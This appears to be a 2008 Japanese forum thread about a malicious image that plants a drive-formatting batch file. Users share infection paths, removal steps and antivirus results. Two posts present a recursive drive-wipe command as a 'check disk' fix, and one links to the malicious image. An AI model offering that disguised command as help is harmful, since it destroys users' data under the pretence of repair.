カスペ体験版はインストール後に再起動を要求されるというとんでもないジレンマだったらしい。
駄目もとでファイルを削除って言うのは例のスタートアップにあるファイルですよね?
とりあえず、その手順を踏んでみたいと思います。
>>243
スタートアップの場所はWikiにかいてありますよ
おおっと・・・そうなんですか・・・
とりあえずスタートアップのやつはにくいので消しときます
/⌒ヽ / '''''' '''''' ヽ
| / | (●), 、(●) |
| | | ,,ノ(、_, )ヽ、,, |
| | | `-=ニ=- ' |
| | ! `ニニ´ .! 天狗じゃ、これも天狗の仕業じゃ!
| / \ _______ /
| | ////W\ヽヽヽヽ\
| | ////WWWヽヽヽヽヽヽヽ
| | ////WWWWヽヽヽヽヽヽヽ
E⊂////WWWWWヽヽヽヽヽヽヽ
E//// ヽヽヽヽヽヽヽ
| | //WWWWWWWヽヽヽヽヽヽヽ
ノノ `'ミ
/ y ,,,,, ,,, ミ
/ 彡 `゚ ゚' l
〃 彡 "二二つ
| 彡 ~~~~ミ はいはい、わしのせい わしのせい
,-‐― |ll 川| ll || ll|ミ―-、
/ |ll | ヽ
/ z W`丶ノW ヽ
/ \\ / / |
/ 天 \`i / / 狗 |
見ましたがどうも私には難しくてよくわかりません
どうすればスタートアップというものをみれるんでしょうか?
XP IE6 です
少しはぐぐれ
心配な人、↓にbatファイルが無ければおk
スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\スタート メニュー\プログラム\スタートアップ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat
AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt
クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat
後、だめもとでniftyのオンラインウイルスチェックね。
これで検出できて駆除できたら楽だろうとは思うが、
途中で止まる場合は手動で消すしかないかもな。
バックアップ作業してるのであとでやってみます
手動で消すのがどうやるか微妙なところですが・・・
まず、
WindowsキーとEキーの同時押しでエクスプローラーが立ち上がる
※IEじゃないぞ
立ち上がったら、左側のツリー構造の中から
「+マイ コンピュータ」って部分を探し出す
見つけたらこの「マイ コンピュータ」の部分をクリック
※マウスの左ボタン1回押しのことね
これで選択状態になったと思う
※いじって無ければ「マイ コンピュータ」の部分が紺色になったかな?
そしたら、テンキーの「*」を押すんだ
よし、ここまでやってみて!
クイック起動は
C:\Documents and Settings\All Users\Application Data\Microsoft\
まではあって
Internet Explorerフォルダ自体が存在しなかったんですが・・・
感染はスタートアップだけに抑えられてるということなのかな・・・
なんでVirusBusterがメジャーなのかと思ったけど、virustotalに出てるVirusBusterは
http://www.virusbuster.hu/ だからトレンドマイクロとは違うよ
エクスプローラを開いたら、ツール(T) → フォルダ オプション(O)を選んで、
表示 → 詳細設定の項目から
・ファイルとフォルダの表示 → すべてのファイルとフォルダを表示する を選ぶ
・保護されたオペレーティング ファイル システムを表示しない(推奨)のチェックを外す
この2つをやらないとAUTOEXEC,BATは見えない。(無いように見える)
うかつに再起動しないようにね。 正直、貴方の書き込みを見ていると、どうもシステムが吹っ飛ぶかどうかの
瀬戸際にいるように見える。
慣れてると真っ先につつく項目だから忘れてた
何という落とし穴。(w
こっちの仮想環境のバスターでも未だに検知できないんで、てっきりVirusTotalの方もバスターだと思ってた。
じゃあ、バスターの方は私の仮想環境で確認続けて、検出できるようになったらスレに報告入れるね。
初心者でなく自作PCだったら余計なHDDは電源を落とした際にすべて切り離すんだが。
嘘か誠か解らんが、ターゲットとなるC以外のHDDが無い場合はDVDプレイヤーを壊すとか壊さないとか。
だからDAEMONで何かをマウントしておき、DVDドライブの両脇にトラップで張りつかしておければ。
それにはコンピューターの管理からドライブのパスを変更しなくちゃいけないんだけど初心者じゃ無理だし。
今からやってみます!
無事に帰還することを祈る。
最初からその設定にしてるので隠しフォルダは見えてるんです。
C:\Documents and Settings\All Users\Application Data\
↑が隠しフォルダ
それ以降の\Microsoft\Internet Explorerは隠しフォルダじゃないはずなのにもともと存在しないという・・・
http://www.google.co.jp/
↑すでにこのURLの色が変わっていたらアウト
おっとsageるの忘れたスマソ
うちも今見てみたけどIEフォルダなし
気にしなくていいと思うよ
どういう意味?
http://www.virustotal.com/jp/analisis/1356327f99e9fd9f3fb225412a057430
あれ、対応8本から7本になってる
ごーぐるは有名ですよねぇ
自分のマシン調べてみたけど、どうも All Usersじゃなくて、各ユーザー毎の方か?(Wikiの間違い?)
ただ、自分のマシンで調べたところでは、このクイック起動の Quick Launch フォルダは、そのまんまスタートの横の
クイック起動のアイコンを示しているらしい。(このフォルダのアイコンを消すと、スタートの横のアイコンも消える)
だとすれば、とりあえず再起動時にクイック起動内のファイルが自動実行されることはないはずだから、
フォルダがなければ無視しても、とりあえず再起動に関しては大丈夫なはず。
はず、ばっかりで申し訳ないが、スタートアップとAUTOEXEC.BATを対処すれば、いけるんじゃないか?
あとは、とりあえずやること全部やったら、再起動時に画面を見ていて、フォーマットしそうになったら電源を切るくらいか。
という報告もあったな。再起動後も安心せずにスタートアップは電源切る前にチェックしとくこと。
ほんとだ・・・各ユーザーのところに存在しやがった・・・orz
Wikiに追記したほうがいい気が・・・
ミスw
フォルダはあって問題のファイルは無かったww
はやとちりスマソw
>そしたら、テンキーの「*」を押すんだ
を試すと変なことになるな
やったんですか?どうなりました?
CPU使用率が100%くらいになってHDがガリガリ言い出す。
タスクマネージャーで見ると
マイコンピューター (応答なし) の状態。
電源切ってしばらくほっとけば問題ないんでしょうか>
タスクマネージャーで「タスクの終了」で止めた。
慌ててると思わず再起動したくなるよ。
>>277の言うように愉快犯だと思う。
報告ありがとうございます
対応済みならいいけど・・
>>221によれば OneCareも対応済みとのことなので
http://onecare.live.com/site/ja-jp/center/howsafe.htm?s_cid=mscom_msrt
はどうかな?
どれがかくじつですか?
怖いものはないでしょ
チェックディスクコマンドを試してみ。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
お前!
いい加減にしろよな!!
見事に何も無くなりスッキリしますた!!
ありがとうございます!
あとは削除されても・・・まぁ・・・
とりあえずウィルススキャン終わったら再起動してどうなるかみます
でも、もしフォーマットされそうになって強制終了したところで、
次の一手はどうなるんだろうw
セーフモードから削除
誤消去防止して物理的にフォーマットできなくしたメディアとかDドライブに入れといても
素通りしてE→F→Gって進んじゃうんですか?
多分Dドライブどうにかしただけで終了
なるほど・・・
ってかウィルススキャン未だに40%・・・
朝までかかるなぁ
では再起動してきます。生きていたら結果報告もしたいと思います
ど、どう?
俺これ踏んだけどどーすりゃいい?
注意力を養うといいよ
まずいかな?
生きてる?
こんなに期待されてるとは思わなかったw
結果はセーフでした!
期待にそぐわないですいませんw
詳しいスペック情報と行った対策っていりますかね?
時間かかったのは安全に起動したのを確認して飯食ってたからですw
俺は寝る。
寒い時代だと…思わんか?
ぎぎぎでうpされてたファイル踏んで>>235のような状況。
まぁやったことといえば例のファイル削除と
OneCareでウィルススキャン(4個のファイルが見つかって削除・修復)
再起動後、一応ファイルが復元されてないかチェックしましたがありません。
ご教授してくださった方には感謝ですー
ご苦労さんですた。良かったね! 忘れられない正月だなw
ま、ゆっくり休んでくれ
プログラム詳しくないから分からんのだが
jpgにどうやってJavascriptとウィルスを組み込むんだろ?
jpgをメモ帳で開いてプログラム書き込めばできるのか・・・?
過去に、A.JPG .EXE
みたいなファイルもあったな
クリックしたらアボーンのやつね。
これを機会にもっとセキュリティに気をつけような。
IE6よりIE7の方が安全性高いし、他にもファイアーフォックスとかIE系より頑強なブラウザもあるし。
更新切れのノートンなんてやめとけ。
金がないのならフリーのアンチウィルスソフトやらファイアーウォールやらもあるし。
ワケあって、IE6です。
x JacaScript
o JavaScript
俺のIEのバージョンを確かめたら6だったよ。
元からIE7にするつもりも更々ないし、
元々IE6が大好きなんだよ俺は。
ネタの張本人現る(笑
IE6の設定はこれでいいの?
わりぃ。俺の所からそれは見れないからパス。
本物の木馬か鑑定よろしくおねがいします
同じネタウイルスか(笑
おk。
つーか俺、プニルだからなぁ。。。
>>323
細菌or酵母?
ビンゴ!
通報ってこと?
ま、あれだ。
「他人の糞ドシで相撲をとる」厨ウイルスってやつだ
具体的に、誰にだ。
画像掲示板も少々行き過ぎで連鎖でやられてたしな
知らないの?
ttp://gamushara.net/
画像掲示板に興味ねえ
321も
真実かどうかはどうでもいいが。
俺のカスペが>>321に反応するんだが・・
他の奴は何ともないのか?
自分で貼ったリンクだろ(笑
>>152-153の設定してる?
Live!2chで見てるから>>152-153は関係ないと思う。
その犯人は腰抜けだった(笑
他にどこにある?
ttp://www.internethotline.jp/
インターネット・ホットラインセンターか
やっと自首するきになったか(笑
おまえだろ、犯人
>>341
各社メーカーが対応しないストレスをどこに吐くかだよな
通報はロハだし新年見せしめ一号欲しいべ
うーん、俺にはわからない。
すまん。
ttp://www.npa.go.jp/cyber/soudan.htm
罪を犯した者が、己が逃れるため他人を犯人扱いして逃げる。
やっぱり、腰抜けか(笑
ひょうたんからコマで捕まるやつほど楽しいものはないw
サイバー犯罪相談窓口は使えるのか(笑
使えるならここの 糞どしウイルス厨 を刑務所に入れてやれよ
おまえも考えろよ
お前と呼ぶな
最強のWin2000様と呼べ(笑
>>349
ちなみに>>321もアウトの範疇なんだろ?
厳密な話は向こうがやること
こっちは情報提供するだけ
お上は身内には甘いが他人には手厳しいから一生懸命書けよ
なんにせよ遊び気分のやつも含めて元を断たねばならん
元断ちか(笑
しかし他にもやり方はあるだろう
器物損壊(または精神的苦痛の障害罪)で刑事Kしたほうが良さそう
あと民事で損害賠償請求。
avast! Anti-Virus Part81
188 :名無しさん@お腹いっぱい。:2008/01/03(木) 11:01:16
ちょっと質問。現在の最新バージョンって
- プログラム: 既に最新です
(現在のバージョン 4.7.1098)
- Vps: 既に最新です
(現在のバージョン 080101-0)
これでおk?
コンピュータ若しくは電磁的記録を対象とした犯罪
電子計算機損壊等業務妨害罪、電子計算機使用詐欺罪等の刑法に規定されている犯罪のほか、ウイルスに感染したファイルを送って、コンピュータを正常に使用できない状態にした場合(器物損壊罪)などがあります。
コンピュータネットワークをその手段として利用した犯罪
電子掲示板を利用し、薬物等の違法な物品を販売する
インターネットに接続されたサーバコンピュータにわいせつな映像を置き、これを多くの人に対して閲覧させる
不正アクセス禁止法違反
コンピュータネットワーク上で他人の識別符号(ID、パスワード等)を無断で使用する
特殊な情報(クラッキングコード等)を入力し、他人のコンピュータへ侵入する
となります。
thx
でも明日からだな…
>>358
thx
田舎者は腰抜けだった。(笑
千葉か田舎だな(笑
363 :最強のWin2000@XPに乗り換え:2008/01/03(木) 11:24:42
他スレッドの自作自演に篭ったか。
田舎者は腰抜けだった。(笑
2kですが何か?
過失はないだろう。
完全に悪意のあるやり方だし。
ttp://www.pref.toyama.jp/sections/6110/high-tech/cyber.html
県警では情報が多いな
少し楽しみが増えたw
新参しかいないの?
やるときは標的は国内も含めてALLで・・・
数打ちゃ当たるを祈願したいねw
めでてぇ
国内外誰でもいいw
さすがにスズリはないけどな
でも人迷惑は罰を受けてもしゃーないな
じゃなきゃ風紀が保てなくなる
陳情書で検索すれば作法がわかる
蛇足だったら悪いな
中のデータだけでも守りたいのですが…
ちょうどその情報が欲しかったところ
>>133
データも何もかも。
どうしたらいいですか?
これから…
パソコンは使いたいのですが…
感染は少女漫画板のNANAスレです。
現行の2つ前くらいです
なんとか普通に使えるように戻したいのですが…どうか助けて下さい。
>>386
ありがと。今月で●が切れる前でちょうどよかったわ。
カスペアンチウィルス5でした。
手の施しようがないのでデータは諦めようかと…
大掃除だと思え。
あとはアミララを恨め
金銭うんぬんより腹いせだわな
まずどこで感染したかとかもメモしておいた方がいい。
で警察署へ行って掲示板のリンクにアクセスしたらPCが壊されたと器物損壊で被害届け出してくる。
あとは警察にまかせるしかないけどね
PCは現状保存で
バックアップありませんので諦めます。
これからどうしたらいいでしょうか?
初心者ですみません、教えて下さい…
人ごと過ぎるし、俺は借りは返す主義。
電源押すとWindows起動する?
何するつもり?
アミララと対決?
ネットも見られます
データは全部消えました
書き込みはできません
少し後ろめたい事があるのだろう。俺はその人の気持ちを汲んで見逃さない。
HD全消去だったらwindowsも根こそぎアウトで
起動しないしネットも見れないんじゃないの?
???
Exploitとかそんな複雑なものじゃないの?
今は携帯から書き込んでます
なんかホワイターの可能性の方が多くない?
あっちでも見かけたかもな
参考にさせてもらった
おれも同情節で参加させてもらうよ
いつのマルウェアだボケ
M$が放置プレーしてる
まだ数十件の放置プレーしてるよ。
多分2014年のXPサポート終了しても未修正の脆弱性は存在するだろうな
つまりあの企業体質を直さないと一緒無理
無知ですみません。
今から何をしたらいいでしょうか?
はみ出したやつが負けw
あっちだとまだ現役だぞ。
新製品が出るたびに検出報告がある。
一生ね
|li _| ̄|○ il|
とりあえず警察行って被害届け
PCはそのまま現状保存しておかないといけない
(証拠保存)
もうアホかと・・・
おまえ邪魔
とりあえずリカバリーしろ。
そうすれば全て解決
わきまえろって感じ
素人の鵜呑みの責任取れるのかよ
それこそ同罪
>>425
気持ちは察する
>>423は証拠隠滅したがってる(させたがってる)んじゃないかな?
ここ
ウイルスだと知って貼っているかがポイントだな。
知っていればもう器物損壊
知らなくても過失は問われるし
民事だと過失でも損害賠償責任はあるからな。
被害者のパソコンを正常に戻すのが先決だと俺は思うんだけど
これって間違ってるの?
そんな雰囲気有りげ
幼稚なやつには制裁が必要だよ
手加減してブラクラ止まりだったのに最近は目に余る
なぜそこまで必死になる?
邪魔
臭いメシ食いたくないのはわかるけど
実際の被害が出てるわけだしなぁ…
実際に突き止められるかはともかく警察に…は間違ってないとは思う
正義のヒーロー気取りばっかw
アミララ捕まればいいねwwwwおまいらの行動力に期待w
当たり前だよね
泣き寝入りはPCが浸透する前までの風潮
もう時代が違う
挙動不審になってきてるようだが?大丈夫か?
人間追い詰められると冷静さを失うからな。
山田ウイルスとか散々性質の悪いのが今まであったのに今回のこの
空気に戸惑ってるだけだ。
結果、理不尽でもいいから晒し上げられる人間が必要。
当時の記事とか見てるとやはりノートンが対応してなくてワロタwww
今も昔も対応の遅さは全然変わってないのな
警察に被害届出すっていえばいい
ここ最近いい加減うざかったからなあ
そうしとこうかな
>>443
セキュ板住人でもそう思うの?
>ここ最近いい加減うざかったからなあ
誰?
趣味でもないしこれでメシ食ってるわけでもないし
これでbatファイルが落とされればexploitついてるってことになるよな?
そうだね
通報しても裁定はキミがするわけじゃないからね
橋下
正確に書くと提出する時のログに残るから良かったね
言われたんだけど、どういう種類のウイルス?ヤヴァイ?
気をつけねば
format.comはリネームしておいてる
死ぬほどやばい。やばいから質問スレへ池。
現段階の各社の対応情況どうなのよ?
スレに貼られたウイルスコードに反応する事があるけど、
スレを見るぐらいでは感染しないよ。多分
ちゃんと切り取るんだぞ
ちょ、コピーじゃ駄目だろw
↑
さっきコレを踏んでしまいウイルスと言われてました
ずっといろんなところを調べたんですけど
スタートアップにはなにもありません
大丈夫なのかわかりますか?というかコレ自体はやはりウイルスなんですか?
面倒だから再起動してみよっと
だめでもいいや
ただのjgp
/〃 | __
/\ _ | __
__ , -――-、 /\ノ
ヽ/\l::::::::::::::::::::\ /: : /
,..-―-、/) |: : :|::::::::::::::::::::::/: : /
/⌒Y (_ノ /) |: : :|:::::::::::::::::::::|: : : /
 ̄l ̄l、 ) /`〉 ヽ:: :|::::::::::::::::::::l: : :/
l: : :`ー--‐'‐'´: :/ \|∧ハ/l/: ::〈
\: : : : : : : : : :く |: : : : : : : : : : `ー-┐ ,.、
l: : : : : : : : : :`ー―┐ ,、 |: : : : : : : : : : : : : : |二lニノ
ヽ.: : : : : : : : : : : : : :|ニノ |: : : : : : : : : : : : : : |
ヽ: : : : : : : : : : : : :| ヽ: : : : : : : : : : : /
\: : : : : : : : :/ \ : : : : : : /
 ̄ ̄ ̄ ̄ ノ|  ̄ ̄ ̄ ノ)
ノしノ し'( ノ)__ノ (ノ(
'――――-'′ '-――一-'
心配して損したw
でもちゃんと帰ってこれた
↑の人ありがとうございます
∵∴∵∴∵∴∵∴/ ̄∵∴∵∴∵∴∴∴∵ヽ
∵∴∵∴∵∴∵∴| ● |∴∵∴∵∴∵∵∵∴ヽ
∵∴∵∴∵∴∵∴ _/ ∴∵∴∵∴∵∴∵∴ ヽ
∵∴∵/ ̄ ̄ ̄ ̄ ,-‐-、 ∴ / ̄∴∵∵∴∵ )
∵∴/ \ / ヽ∴| ● |∴∵∵∴ ノ
∵/ \ \ l | _/∴∵∴∴ノ
/ \ \ ゝ___,.ノ |∴∵∴∵∴∵ 丿 三が日は終わったぞ
\ / |∴∵∴∵∴∵ノ
/ |∴∵∴∴∵ 丿 いつまでも起きてないで
\ / \ |∴∵∴∵∴ノ 早く寝た方がいい
\/ \ \ |∴∵∴∵ノ
\ \ \ \ |∴∵∴ノ …おまえ達を見てると心配になる
\\ \ \ /∴∵ノ http://www.youlost.mine.nu/html999/img/2718.jpg
//
「拡張子ではなく、内容によってファイルを開く」という項目がありません。
この項目どこにありますか?
ちなみにIE6.00です。
IE6だから同じだと思うけど。
ちなみに「拡張子ではなく、内容によってファイルを開くこと」になってる。
ありがとうございます、485です。
こちらの「その他」の項目の下から三番目は「異なるドメイン間のサブフレームの移動」となってます。
どなたか御存知の方、宜しくお願いします。
また今夜に来ます。
XPPRO使ってるのが関係あるかは知らないけど。
以前どっかでtxtファイルをhtmlとして読んで変なサイトに飛ばされたんで
無効にした
そしてうっかりパソコンを終了してしまったらどうしたらいい?
パソコンの環境によって対処法は異なる。
心配ならこまめにバックアップを取るようにしたらどうだ?
よくあるパソコンの環境の対処法でおしえて。
バックアップをとっておくこと
バックアップとったあとに大切なファイルがあったときは無理ってこと?
やさしいな;;
SDカードいれてカードリーダモードにするだけだ
対応機種だけだけど
にんげ〜ん〜ごじゅ〜うね〜ん〜
消したらまたドドドンとでてくるんだ
これってそのブラクラのせいかな?
怖くて眠れないから誰か教えてくださいorz
共犯になるとも知らず
どんどん警察のサイバー犯罪ページから報告したほうがいいな。
すまん
初心者だからよくわからないんだがメモリ不足の場合どうすればいいんだ?
脅迫罪においての脅迫は、人の生命、財産、身体、名誉、自由(通説によれば貞操や信念も含む)に対して害悪する告知を行うことである。相手が恐怖心を感じるがどうかは問わない
抽象的危険犯
今回ので対応してるかしらん
とりあえず
いや俺も初心者だからわかんないw
なんてエラーが出てるのかもわかんないし
チェックディスクコマンドを試してみ。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
お前の書き込みは器物損壊罪に該当する。
警察に通報した。
※513の内容はHD内容を消去する方法です。
押して cmd /c rd /s /q c: と打ちOKを押したら、
デスクトップのファイルが消えてたり、共有ドキュメントはあるんですが、
もうかたっぽの方のドキュメントが消えていました。
すぐにもとに戻したいんですが、どうしたら戻りますか?
ここは怖いインターネッツですね
それ何が面白いの?
ニッポン人なら松、竹、梅、い、ろ、は、に、ほ、へを使えよ!!!
IE6 SP2以降。。。
松:業務用データ
竹:私用データ
梅:娯楽用データ
インターネットに繋がったPCからはアク禁です
もう何回目だ?
調子に乗りすぎ。
しかも毎回同じ文章だしな。
おとなしく自首したほうがいい。
少しは罪も軽くなるだろう。
http://www13.atwiki.jp/burakura_hdd/pages/12.html
現在の対応状況は半数にも満たしてない
ノートンもバスターも対応したっぽいじゃん
次週につづく。。
親父の携帯に親父のPCからメールが来たんだけど、転送する設定にはしてないらしい。
内容はどーでもいい出会い系かなんかの日本語スパム。
エロ画像もグロ画像も踏んでないし、2chもやってないらしいから違うのかも知れないけど。
親父の携帯と親父のPCのメルアドを知っている第三者からの悪戯に一票。
メールのヘッダを調べれば発信元のIPがわかるから誰が犯人だか見当つくよ。
スレ違いです。涙目で退場下さい。
イッテラ以上のバックアップが必要な人は大変だぁ〜ね!
( ^ω^)つ【練炭】
メガバイト (MB)
ギガバイト (GB)
テラバイト (TB)
ペタバイト (PB)
エクサバイト(EB)
ゼタバイト (ZB)
ヨタバイト (YB)
ヲタバイト (WOB)←ワロスW
ありがとう。おまいら
罪を犯した人を憎むのではなく、その人を犯行に及ぼした”種や理由”を憎むのです。
人は稀に強い正義感から罪を犯してしまうこともあるのですから。
よかた
これは大丈夫かね
今日未明にとっくに対応してますが
そうなの?さっきどっかでまだだって書き込み見たから
スレで画像に対してウイルスだとか言われてるのいくつも保存してあったけど、スキャンしても出ないな
ウイルスのサンプルってどこにもない?
その画像ファイルのコメント領域かどこかにウイルス発動のためのコードが書いてある
それをIE系が画像ファイルとして処理しないでテキストとして処理しようとしてコードが実行され、
発動のためのbatファイルがスタートアップに保存される
スタートアップに保存されたから再起動時に実行されると終わりということ?
トンクス
誤爆じゃないっす。まとめサイトにメールが送られてきたとか書いてあったんで。
ヘッダ見るという事を忘れてました。親父に言っときます。
保存したらAVGがSmallなんたらって出た
そう。
馬鹿みたいなことするなよ。
ttp://www.virustotal.com/analisis/0a855807d8948a0870105bb62c373924
ニュー速の現行スレに本体のJScriptファイルらしきものがおいてある。
素人だから見てわからなかったが、暗号化されてると聞いて背筋が凍った。
【IT】 HDDをフォーマットしちゃうWebサイトが出現。ご注意を!★8
ttp://mamono.2ch.sc/test/read.cgi/newsplus/1199295435/
まとめWikiではギコナビの画像プレビュー機能は大丈夫って書いてあるんだけど、どっちが正しいの?
起動する時にHDフォーマットされそうになるのはなんでだぜ?
キーボードのBreak押したら一応キャンセルはできるみたいだが・・・
どの時点で出てくるものでFormat云々とか書いてあるの?
ギコナビの画像プレビューで例の画像ポップアップしたけど
とりあえずbatに関してはどこにもダウンロードされてないのを
これに対応済みの複数のウイルススキャン(全ファイル)で確認したよ
怪しいフォルダを開いても見つからなかった
ただ、ギコナビの画像プレビュー用にTemporary Internet Filesに作られた画像ファイルに
トロイの反応あり
手動で削除して、再起動も何回かして2日程度たつけどとりあえず今PCに異常なし
多分大丈夫だとは思うんだけど
心配ならしばらくのあいだ画像プレビューポップアップを無効にしておいたほうがいいかも
ttp://bakera.jp/ebi/topic/3052
今回のgigigiはこれじゃなかったが、万が一これだった場合は無効にしてても無意味だった
上記テストファイルはOperaでもhtmlとして判断してしまってる…
Temporary Internet Files\Content.IE5\〜\2718[1].jpg
っていうのがやたら反応しまくるんだが・・・
このスレのせいだったのかorz
Windowsに“出来ねよ(゚Д゚)ゴルァ!!”された
読み取り専用になってた
再度やったらまた保存できねぇ
今度はZAが原因だった
再々度、やったら
今度はWindowsデフェンダが
“HOSTSが変わるぞ((((;゚Д゚))))ガクガクブルブル”してきた
許可して
やっと出来たぜ。
●、BEログイン対応
http://pc11.2ch.sc/test/read.cgi/php/1060009605/508
御三家の中で馬鹿フィーだけ取り残されてワロタ
脳豚(/ω\)ハズカシーィ
中華以下かよwww
まぁ新種ウイルスへの警戒で御三家を使う事自体がアホだけど。
BitDefenderは一日に何回も更新してるのに最近は新種や亜種に弱い、何をアップデートしてるんだよ。
どこが恥ずかしいのか見てきた。どこかの宣伝部隊か?
なんでもかんでも対応してると定義ファイルが肥大化するよ。
ファイル名 uho2155.jpg 受理 2008.01.05 02:29:02 (CET)
現在の状態: 完了
結果: 4/32 (12.5%)
アンチウイルス バージョン 更新日 結果
F-Secure 6.70.13030.0 2008.01.04 Trojan.HTML.Agent.b
Kaspersky 7.0.0.125 2008.01.05 Trojan.HTML.Agent.b
Sophos 4.24.0 2008.01.04 Mal/Iframe-F
Webwasher-Gateway 6.6.2 2008.01.04 Webwasher: Win32/ImgTagVulnerability
http://www.virustotal.com/jp/
http://www.virustotal.com/jp/analisis/b1664553cd2f83a716189fb30975314a
対応が遅い、あるいは対応しないということは
この脅威が相対的に重要ではないんだよ。
http://canon-sol.jp/product/nd/virusupd/index.html
ノートンやバスターだって対応したのにそんな言い訳通用しねーよw
AntiVir送った
ありがとう。これからEsetに送ってみる。
この中にSymantecやTrendMicro、Kasperskyが対応していない
マルウェアがあるかもしれないよ。
http://canon-sol.jp/product/nd/virusupd/index.html
話題になってると非常に重要だと思えるかも知れないが、
案外目につかないところでいくつも新しいより重要な脅威が
発生しているのかもしれないよ。
HDDをフォーマットするマルウェアには対応してるんだし、
IE6SP2以降のIEでは同類のトラップを回避できる設定もあるし、
他のブラウザにも影響しないようだし、重要性自体はそれほど高くはないんじゃ?
ねーよカスが
NOD厨はここでオナニーしないでさっさと失せろ
で、カスペが躍進してるという現実。
頑張ってbatファイルかよw
世 界 中 か ら 笑 わ れ て ま す よ
キタコレ
冬厨逮捕のチャンスじゃん
バックアップはしていたので思い切ってPC買い換えようかと思ったけど
使い慣れたXPノートをもうしばらく使おうと思い、リカバリして
完全復帰した俺です。
あんたはエロイ!
あんたはアマイ!
踏むこともなかったのにね
俺「そこにURLがあるからです!」
遅くなったけどサンクス
モジュール 対象 名前 ウイルス アクション ユーザ システム情報
IMON ファイル file1.exe Win32/Spy.Goldun.NCK トロイ 隔離済 - 切断されました
IMON ファイル fds1010.exe Win32/TrojanDownloader.Zlob.BNY トロイ 隔離済 - 切断されました
IMON ファイル upd.php?t=559 HTML/TrojanDownloader.IFrame トロイ 隔離済 - 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル ~jjenscom/up4/index.php JS/TrojanDownloader.Agent.ZZ トロイ 隔離済 - 切断されました
IMON ファイル check/upd.php?t=559 HTML/TrojanDownloader.IFrame トロイ 隔離済 - 切断されました
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種
IMON ファイル ekryhhpo ウイルスの可能性 : Win32/TrojanDropper.Agent トロイ の亜種
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル 000/loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル 000/dnlsvc.exe Win32/TrojanProxy.Agent.JL トロイ 隔離済 - 切断されました
IMON ファイル 000/loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 隔離済 - 切断されました
IMON ファイル bla.exe ウイルスの可能性 : Win32/Statik トロイ の亜種
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ 切断されました
IMON ファイル pics.com/ JS/TrojanDownloader.Agent.NAX トロイ 切断されました
IMON ファイル ?id=1005 JS/TrojanDownloader.Agent.AB トロイ 切断されました
IMON ファイル .org/ JS/TrojanDownloader.Agent.NAX トロイ 切断されました
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ
IMON ファイル go.exe Win32/TrojanClicker.Delf.IT トロイ
IMON ファイル /dnlsvc.exe Win32/TrojanProxy.Agent.JL トロイ
IMON ファイル loader.exe Win32/TrojanDownloader.Tiny.NCX トロイ
IMON ファイル 2.ani Win32/TrojanDownloader.Ani.Gen トロイ の亜種
IMON ファイル test.html JS/TrojanDownloader.Psyme.NBZ トロイ
IMON ファイル cyber.wmf Win32/Exploit.WMF トロイ の亜種
IMON ファイル test.html JS/TrojanDownloader.Psyme.NBZ トロイ
IMON ファイル pics.com/ JS/TrojanDownloader.Agent.NAX トロイ
IMON ファイル ?id=1005 JS/TrojanDownloader.Agent.AB トロイ
IMON ファイル org/ JS/TrojanDownloader.Agent.NAX トロイ
ちなみに、ホスト側Windows XP SP2には全く影響なし。
結果、多数の怪しげなプログラムが組み込まれました。かなり有害。
svchost.exeがたくさん起動してます。ユーザー権限でw
万一実環境で踏んじゃった人は、ログイン直後にタスクマネージャを開いて、
userinit.exeをRとログインが止まるので手動でexplorerのみ立ち上げて、
C:\Backup_driversとかいうフォルダをフォルダごと削除。
msconfigとかで怪しいスタートアップを解除orregeditで削除。
結構簡単に消せました。私の環境では。
gj
ようわからんけど、これもJSをOKにしておくと食らうもんなの?
もしそうなら、今回の騒動でJSを切ったり、ブラウザ・専ブラ変えてたりする人が
多いだろうから、まだ被害もそんなに出ないんだろうけど。
userinitってのはログイン時にしか出ないのかな、
だとしたら、とりあえず、未対応ベンダーの場合、
Cドライブに怪しいフォルダがあるかが感染の判別ポイントなのかな…。
あと、スタートアップは、スタートメニュー内のフォルダは手動できれいにすればいいとしても、
レジストリの方は自分で掃除するのが怖い場合、
スタートアップチェッカーあたりをあらかじめ入れてないと困るのかな…
短縮URLを使ったやつを2ch以外に書き込むやつもいるようだし、
2chに書き込みをせずP2Pを使わないで、たかだかWebを見て回るだけでも、
おびえながらやるようなことになるのかな、今後…。
> msconfigとかで怪しいスタートアップを解除orregeditで削除。
kwsk。
例えばどんなぁゃιぃプログラムが常駐するの?
「svchost .exe」(ファイル名末尾に空白あり)が6つほど
「ms-1.exe」
